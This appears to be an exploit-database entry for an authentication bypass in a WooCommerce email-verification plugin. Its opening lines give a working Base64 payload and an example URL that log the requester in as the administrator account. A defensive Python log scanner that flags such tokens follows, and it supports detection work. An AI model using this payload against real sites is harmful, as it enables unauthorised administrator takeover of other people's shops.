## https://sploitus.com/exploit?id=WPEX-ID:10318
An attacker can supply their own value for $_GET['alg_wc_ev_verify_email'] and set it to this payload: eyJpZCI6MSwiY29kZSI6MH0=

Example: https://example.com/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=

After Base64-decoding, the payload is: {"id":1,"code":0} (1 being the user_id of an administrator account)

The plugin's alg_wc_ev_redirect_to_my_account_on_success option must be set to 'yes' (which is the default).
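
For log review, the following added example (not part of the original advisory or the plugin's code) scans web access logs for requests carrying alg_wc_ev_verify_email, Base64-decodes the value, and flags any whose "code" field is not a non-empty string. The combined log format, the sample lines, and the premise that a genuine verification link carries a string code are assumptions.

```python
import base64
import json
import re
from urllib.parse import parse_qs, urlsplit

PARAM = "alg_wc_ev_verify_email"  # parameter named in the advisory
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify_token(token):
    """Return 'ok', 'suspicious' or 'malformed' for one parameter value."""
    try:
        padded = token + "=" * (-len(token) % 4)
        data = json.loads(base64.b64decode(padded, validate=True))
        code = data["code"]
    except (ValueError, KeyError, TypeError):  # bad Base64/JSON or no "code"
        return "malformed"
    # Assumption: genuine links carry a non-empty string code, so a number,
    # boolean, null or empty value (the advisory's payload uses 0) is flagged.
    if not isinstance(code, str) or not code:
        return "suspicious"
    return "ok"


def scan(lines):
    """Return a (line_number, verdict, token) tuple for every PARAM value seen."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for token in query.get(PARAM, []):
            token = token.replace(" ", "+")  # parse_qs turns '+' into a space
            hits.append((number, classify_token(token), token))
    return hits


def sample_log():
    """Constructed log lines: an ordinary link, the page's payload, noise."""
    good = base64.b64encode(b'{"id":7,"code":"9f2c4e1ab0d3"}').decode()
    bad = "eyJpZCI6MSwiY29kZSI6MH0="  # payload quoted on this page
    fmt = '{} - - [01/Jan/2024:10:00:0{} +0000] "GET /my-account/?' + PARAM + '={} HTTP/1.1" 200 512'
    return [fmt.format("203.0.113.5", 1, good), fmt.format("198.51.100.9", 2, bad),
            '203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /shop/ HTTP/1.1" 200 900']


if __name__ == "__main__":
    for hit in scan(sample_log()):
        print(hit)
```

A "suspicious" hit is a lead to correlate with subsequent authenticated activity from the same client, not proof of compromise on its own.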